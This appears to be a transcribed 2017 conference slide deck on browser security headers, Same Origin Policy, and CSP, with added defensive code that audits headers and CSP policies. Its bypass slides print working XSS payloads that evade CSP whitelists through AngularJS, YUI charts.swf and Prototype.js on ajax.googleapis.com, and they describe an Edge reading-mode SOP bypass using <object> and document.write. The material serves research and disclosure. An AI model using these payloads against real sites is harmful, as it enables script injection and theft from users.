SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School
Agenda - Me? - Abstract - What is HTTP Secure Header? - What is SOP(Same Origin Policy)? - SOP(Same Origin Policy) Bypass 1-Day - Details CSP(Content-Security-Policy) - CSP Bypass (Whitelist) - Conclusion
Me? - 김동현 (hackpupu) - 1995.02.13 - researcher@(c)i2sec - CTF, Web Hacking, Pentester - Scuba Diving, Sea - http://fb.com/hackpupu - http://hackpupu.github.io
Abstract - This talk introduces vulnerabilities related to secure headers as part of browser hacking.
What is HTTP Secure Header? Which response headers can affect the client browser?
Option | Function | Example
Content-Security-Policy | Prevents XSS attacks; allows static resources only from permitted URLs | Content-Security-Policy: script-src 'self' https://apis.google.com
X-Frame-Options | Blocks framing / allows only the configured domain | X-Frame-Options: SAMEORIGIN or DENY or http://i2sec.co.kr/
X-Content-Type-Options | Blocks MIME-sniffing attacks | X-Content-Type-Options: nosniff
Strict-Transport-Security | Forces the connection to HTTPS (blocks MITM attacks) | Strict-Transport-Security: max-age=1607400; includeSubDomains
Public-Key-Pins | Compares the certificate pin before connecting (detects forged certificates) | Public-Key-Pins: pin-sha256="<sha256>"; pin-sha256="<sha256>"; max-age=15768000; includeSubDomains
X-XSS-Protection | Enables the browser's XSS filter | X-XSS-Protection: 1; mode=block
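An added example, not from the slides, that audits a captured set of response headers against the secure headers listed above. The header values are constructed for the example; the one-year HSTS max-age threshold is an assumption chosen for this check, and Public-Key-Pins is left out because browsers have since dropped HPKP support.

```javascript
// Added example (not the talk's code): check a response-header map for the
// secure headers listed on the slide and report weak or missing values.
const ONE_YEAR_SECONDS = 31536000; // assumed threshold for HSTS max-age

function parseDirectives(value) {
  // "max-age=1607400; includeSubDomains" -> { "max-age": "1607400", includesubdomains: "" }
  const out = {};
  for (const part of value.split(";")) {
    const [k, v = ""] = part.trim().split("=");
    if (k) out[k.trim().toLowerCase()] = v.trim().replace(/^"|"$/g, "");
  }
  return out;
}

function auditSecureHeaders(headers) {
  // Header names are case-insensitive, so normalise them first.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const findings = [];

  if (!h["content-security-policy"]) findings.push("missing Content-Security-Policy");

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (!xfo) findings.push("missing X-Frame-Options");
  else if (xfo !== "DENY" && xfo !== "SAMEORIGIN")
    findings.push(`X-Frame-Options value '${xfo}' is not DENY or SAMEORIGIN`);

  if ((h["x-content-type-options"] || "").trim().toLowerCase() !== "nosniff")
    findings.push("X-Content-Type-Options is not nosniff");

  const hsts = h["strict-transport-security"];
  if (!hsts) findings.push("missing Strict-Transport-Security");
  else {
    const d = parseDirectives(hsts);
    const maxAge = Number(d["max-age"]);
    if (!(maxAge >= ONE_YEAR_SECONDS)) findings.push(`HSTS max-age ${d["max-age"]} is below one year`);
    if (!("includesubdomains" in d)) findings.push("HSTS lacks includeSubDomains");
  }

  const xss = (h["x-xss-protection"] || "").replace(/\s/g, "").toLowerCase();
  if (xss && xss !== "1;mode=block") findings.push("X-XSS-Protection is set but not '1; mode=block'");

  return findings;
}

// Constructed sample headers using the slide's example values.
const SAMPLE_HEADERS = {
  "Content-Security-Policy": "default-src 'none'; script-src 'self' https://apis.google.com",
  "X-Frame-Options": "deny",
  "X-Content-Type-Options": "nosniff",
  "Strict-Transport-Security": "max-age=1607400; includeSubDomains",
  "X-XSS-Protection": "1; mode=block",
};

console.log(auditSecureHeaders(SAMPLE_HEADERS));
```

Run against the slide's own HSTS example, the only finding is the short max-age (1607400 seconds is about 18 days); a missing header set produces one finding per absent header.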
What is HTTP Secure Header? Github Response Header Example
What is SOP(Same Origin Policy)? Same Origin Policy Details - Example
Example: http://seoul.i2sec.co.kr/index.html
URL | Result | Reason
http://seoul.i2sec.co.kr/secuinside/test.html | Success |
http://seoul.i2sec.co.kr/education/main.html | Success |
https://seoul.i2sec.co.kr/secure.html | Fail | different protocol
http://seoul.i2sec.co.kr:8080/etc.html | Fail | different port
http://busan.i2sec.co.kr/etc.html | Fail | different host
What is SOP(Same Origin Policy)? Same Origin Policy Details - What is Origin? http://seoul.i2sec.co.kr:8080 = scheme (http://) + hostname (seoul.i2sec.co.kr) + port (:8080) = Origin
What is SOP(Same Origin Policy)? Same Origin Policy Details - IE Exceptions - Trust Zones: if both domains belong to a trusted zone, the SOP is not applied, e.g. corporate domains. - Port: IE does not compare ports. http://seoul.i2sec.co.kr:8080/index.html = http://seoul.i2sec.co.kr:80/index.html
What is SOP(Same Origin Policy)? Same Origin Policy Details - Inherited origins - For URLs such as about:blank, data: or javascript:, the URL itself carries no origin information, so the document inherits the policy of the document that invoked the URL. http://seoul.i2sec.co.kr -> about:blank, data:, javascript: -> Origin: seoul.i2sec.co.kr
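An added example, not from the slides, that models the origin rules of the last four slides in code: scheme, host and port must all match, the IE port exception is an option, and about:blank, data: and javascript: URLs inherit the opener's origin. It uses the WHATWG URL API (available in Node and browsers); the table of URLs is the slide's own example.

```javascript
// Added example (not the talk's code): same-origin comparison following the
// rules on these slides.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };
// Schemes whose URLs carry no origin of their own ("Inherited origins" slide).
const INHERITING_SCHEMES = new Set(["about:", "data:", "javascript:"]);

function originOf(urlString, openerUrl = null) {
  const u = new URL(urlString);
  if (INHERITING_SCHEMES.has(u.protocol)) {
    // Inherit from the document that opened/navigated to this URL, if known.
    return openerUrl ? originOf(openerUrl) : null;
  }
  return {
    scheme: u.protocol,
    host: u.hostname,
    // The URL parser drops a default port (":80" on http), so restore it.
    port: u.port || DEFAULT_PORTS[u.protocol] || "",
  };
}

function isSameOrigin(a, b, { ignorePort = false, openerUrl = null } = {}) {
  const oa = originOf(a, openerUrl);
  const ob = originOf(b, openerUrl);
  if (!oa || !ob) return false; // an origin-less URL with no opener is opaque
  return oa.scheme === ob.scheme && oa.host === ob.host && (ignorePort || oa.port === ob.port);
}

// The slide's table, evaluated against the base document. ignorePort=true
// reproduces the IE behaviour described on the "IE Exceptions" slide.
const BASE = "http://seoul.i2sec.co.kr/index.html";
function evaluateSlideTable(ignorePort = false) {
  const rows = [
    "http://seoul.i2sec.co.kr/secuinside/test.html",
    "http://seoul.i2sec.co.kr/education/main.html",
    "https://seoul.i2sec.co.kr/secure.html",
    "http://seoul.i2sec.co.kr:8080/etc.html",
    "http://busan.i2sec.co.kr/etc.html",
  ];
  return rows.map((url) => ({ url, sameOrigin: isSameOrigin(BASE, url, { ignorePort }) }));
}

console.log(evaluateSlideTable());
console.log("about:blank opened from BASE shares its origin:", isSameOrigin(BASE, "about:blank", { openerUrl: BASE }));
```

The port normalisation matters in practice: http://host:80/ and http://host/ are one origin, and a comparison on the raw URL string would get that wrong.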
What is SOP(Same Origin Policy)? Edge Browser SOP Bypass Using Reading Mode - All source code is on hackpupu's GitHub - https://github.com/hackpupu/papaer/2017/secuinside/demo_sop
SOP(Same Origin Policy) Bypass 1-Day Edge Browser SOP Bypass Using Reading Mode Read Mode ON
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details http://secuinside.org/2017/ctf.html Read Mode ON Original HTML Read Mode HTML
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details Read Mode ON - Tags deleted by Read Mode: <script> <hr> <section> <footer> <li> <header> <nav> <article> <ul> (e.g. secuinside.org/2017/ctf.html)
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details http://secuinside.org/2017/ctf.html
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details read:http://secuinside.org/2017/ctf.html
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Conclusion - The Edge reading-view CSS is an internal file loaded from C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\ReadingView - Edge Read Mode deletes tags (script, iframe and other HTML tags) - It loads in the background without the user knowing
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 http://secuinside.org
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 read:http://secuinside.org
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 Finding an interesting redirect URL
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 location.href and the URL bar are not changed
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#2 The <object> tag is not removed, so it can be written: <object data="http://www.i2sec.co.kr/secuinside/data.js"></object> http://www.i2sec.co.kr/secuinside/data.js
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#3 document.write of the data, using top.location! <object data="http://www.i2sec.co.kr/secuinside/data.js"></object> http://www.i2sec.co.kr/secuinside/data.js
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability Conclusion - Using an Edge Read Mode redirect, the URL bar and location.href value do not change - Edge Read Mode does not delete the object tag - Edge Read Mode allows document.write
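The vulnerability chain above comes down to a deny-list sanitiser: reading mode strips the tags on the "Deleted Tags" slide, but <object> is not on that list and can still load foreign content. The following is an added example, not Edge's or the author's code, contrasting a toy deny-list sanitiser built from the slide's tag list with an allow-list version; the HTML input and the tag allow-list are constructed for the example.

```javascript
// Added example (not the talk's code): deny-list vs allow-list tag stripping.
// Deny list taken from the "Read Mode Deleted Tags" slide.
const READ_MODE_DELETED = new Set(["script", "hr", "section", "footer", "li", "header", "nav", "article", "ul"]);
// Constructed allow list of tags a reading view needs to render an article.
const READ_MODE_ALLOWED = new Set(["p", "h1", "h2", "h3", "a", "em", "strong", "img", "div", "blockquote"]);

const TAG_RE = /<\/?([a-z][a-z0-9]*)\b[^>]*>/gi;
const SCRIPT_BLOCK_RE = /<script\b[^>]*>[\s\S]*?<\/script>/gi;

// Deny-list approach: remove <script> with its body, then any other listed tag.
function denylistSanitize(html) {
  return html
    .replace(SCRIPT_BLOCK_RE, "")
    .replace(TAG_RE, (tag, name) => (READ_MODE_DELETED.has(name.toLowerCase()) ? "" : tag));
}

// Allow-list approach: anything not explicitly permitted is removed, so an
// element the author never thought about (<object>, <embed>, ...) cannot pass.
function allowlistSanitize(html) {
  return html
    .replace(SCRIPT_BLOCK_RE, "")
    .replace(TAG_RE, (tag, name) => (READ_MODE_ALLOWED.has(name.toLowerCase()) ? tag : ""));
}

// Tags that can still load or run foreign content after sanitising.
function activeTagsLeft(html) {
  const left = new Set();
  for (const m of html.matchAll(TAG_RE)) {
    const n = m[1].toLowerCase();
    if (["script", "object", "embed", "iframe"].includes(n)) left.add(n);
  }
  return [...left].sort();
}

// Constructed page mirroring the slides' scenario: an <object> whose data URL
// points at a script resource (placeholder host, not the talk's URL).
const SAMPLE_HTML =
  '<article><h1>CTF</h1><script>alert(1)</script>' +
  '<object data="https://example.invalid/data.js"></object><p>rules</p></article>';

console.log("deny-list leaves:", activeTagsLeft(denylistSanitize(SAMPLE_HTML)));
console.log("allow-list leaves:", activeTagsLeft(allowlistSanitize(SAMPLE_HTML)));
```

The deny-list version drops the script but keeps the <object>, which is exactly the gap the slides describe; the allow-list version leaves nothing that can fetch or execute foreign content. A real sanitiser also has to filter attributes on the tags it keeps (href, src, event handlers), which this toy deliberately does not do.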
SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Demo SOP Bypass 1-Day DEMO
CSP(Content-Security-Policy) Details CSP Options Content-Security-Policy: script-src 'self' https://apis.google.com - script-src: the resource type being allowed - https://apis.google.com: the other domain (origin) allowed by domain
CSP(Content-Security-Policy) Details CSP Options - Access-Allow Resource Type
Option | Function | Example Domain
base-uri | Restricts the URLs that may appear in the <base> tag |
child-src | Restricts the URLs that may appear in frame tags | child-src https://youtube.com
connect-src | Restricts the origins that may be connected to via XHR, WebSocket or EventSource |
font-src | Restricts the origins that may serve web fonts | font-src https://themes.googleusercontent.com
form-action | Restricts the endpoints of the action in a <form> tag |
img-src | Restricts the origins images may be loaded from |
media-src | Restricts the origins video and audio may be loaded from |
style-src | Restricts the origins stylesheets (CSS) may be loaded from | style-src https://www.bootstrapcdn.com/
CSP(Content-Security-Policy) Details CSP Options - Another Tip - Content Security Policy (CSP) blocks eval() method calls - CSP blocks the use of eval() in JavaScript - If the CSP does not specify unsafe-inline, inline event handlers are blocked
CSP(Content-Security-Policy) Details Why do attackers care about CSP? Drive-by download attack: hacker_site/hack.js -> Victim Site include(hacker_site/hack.js) -> User Browser
CSP(Content-Security-Policy) Details Why do attackers care about CSP? - CSP enabled: the drive-by download attack hacker_site/hack.js -> Victim Site include(hacker_site/hack.js) no longer reaches the User Browser
CSP(Bypass) Bypass CSP(Bypass) Example, Edge 0-Day and CSP WhiteListDomain - All source code is on hackpupu's GitHub - https://github.com/hackpupu/papaer/2017/secuinside/demo_csp
CSP(Bypass) Edge Bypass application/pdf not filtering - Demo <embed type="application/pdf" src="http://www.africau.edu/images/default/sample.pdf" width="800" height="500">
CSP(Content-Security-Policy) Details Is CSP really safe? Content-Security-Policy: script-src 'self' ajax.googleapis.com
CSP Bypass (Whitelist) CSP bypass XSS Challenge https://github.com/cure53/xsschallengewiki/wiki/h5sc-minichallenge-3:-%22Sh*t,-it%27s-CSP!%22
CSP Bypass (Whitelist) CSP bypass Using AngularJS ng-csp Options "ng-app ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
CSP Bypass (Whitelist) CSP bypass Using Google ExternalInterface XSS "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?alloweddomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
CSP Bypass (Whitelist) CSP bypass Using AngularJS + Prototype.js "ng-app ng-csp><base href=//ajax.googleapis.com/ajax/libs/><script src=angularjs/1.0.1/angular.js></script><script src=prototype/1.7.2.0/prototype.js></script>{{$on.curry.call().alert(1337
CSP Bypass (Whitelist) CSP bypass DEMO(ajax.googleapis.com)
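The "Is CSP really safe?" slide and the three bypass slides above make one defensive point: a script-src whitelist is only as strong as the weakest host on it, and a CDN that serves arbitrary AngularJS, YUI or Prototype builds gives an attacker script execution inside the policy. The following is an added example, not the talk's code, that parses a Content-Security-Policy header and flags script-src settings this talk shows to be weak (unquoted self, unsafe-inline, unsafe-eval, wildcard sources, and the library-hosting CDN from the slides). The CDN list contains only the host the slides use and is a constructed starting point.

```javascript
// Added example (not the talk's code): CSP script-src audit.
// Hosts known to serve arbitrary versions of script libraries; the slides only
// demonstrate ajax.googleapis.com, so that is the only entry here.
const SCRIPT_LIBRARY_CDNS = new Set(["ajax.googleapis.com"]);

// "default-src 'none'; script-src 'self' cdn.example" -> { "default-src": ["'none'"], "script-src": [...] }
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// "https://cdn.example:443/path" -> "cdn.example"; keywords and bare schemes -> ""
function hostOf(source) {
  if (source.startsWith("'") || /^[a-z]+:$/i.test(source)) return "";
  return source.replace(/^[a-z]+:\/\//i, "").split("/")[0].split(":")[0].toLowerCase();
}

function auditScriptSrc(header) {
  const policy = parseCsp(header);
  // script-src falls back to default-src when absent.
  const sources = policy["script-src"] || policy["default-src"];
  const findings = [];
  if (!sources) {
    findings.push("no script-src or default-src: scripts may load from any origin");
    return findings;
  }
  for (const src of sources) {
    const lower = src.toLowerCase();
    const host = hostOf(src);
    if (lower === "self") {
      findings.push("unquoted self is matched as a host name, not the 'self' keyword");
    } else if (lower === "'unsafe-inline'") {
      findings.push("'unsafe-inline' allows inline scripts and inline event handlers");
    } else if (lower === "'unsafe-eval'") {
      findings.push("'unsafe-eval' allows eval()");
    } else if (lower === "*" || /^[a-z]+:$/.test(lower) || host.startsWith("*")) {
      findings.push(`${src} is a wildcard source: every matching host may serve scripts`);
    } else if (SCRIPT_LIBRARY_CDNS.has(host)) {
      findings.push(`${src} serves arbitrary AngularJS/YUI builds that bypass a whitelist`);
    }
  }
  return findings;
}

// The policy from the "Is CSP really safe?" slide.
console.log(auditScriptSrc("script-src self ajax.googleapis.com"));
```

The mitigation the audit points towards is the one the conclusion slide gives: do not trust a shared CDN on the whitelist; host the exact library files yourself or move to nonce- or hash-based script-src so that no whitelisted host can be abused.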
Conclusion - The way security headers and policies are applied differs from browser to browser. - You may believe the headers are applied safely, but vulnerabilities still exist! - SOP, CSP and the like offer many entertaining bypass ideas. - Newly added third-party features are also well worth a look. - Do not trust CDNs and the AngularJS sandbox 100%.
0-day IE11! from James Lee - All source code is on hackpupu's GitHub - https://github.com/hackpupu/papaer/2017/secuinside/0_day
0-Day IE11! from James Lee MS IE11 Information Disclosure, Content Spoofing, etc https://ineedthinkpad.blogspot.kr/2017/05/msie11.html https://github.com/hackpupu/paper/2017/secuinside/demo/ie11
Thank you :) - Reference
https://tools.ietf.org/html/rfc6797
https://developer.mozilla.org/en-US/docs/Web/Security/HTTP_strict_transport_security
https://www.brokenbrowser.com/sop-bypass-abusing-read-protocol/
https://github.com/cure53/xsschallengewiki/wiki/h5sc-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22
https://ineedthinkpad.blogspot.kr/2017/05/msie11.html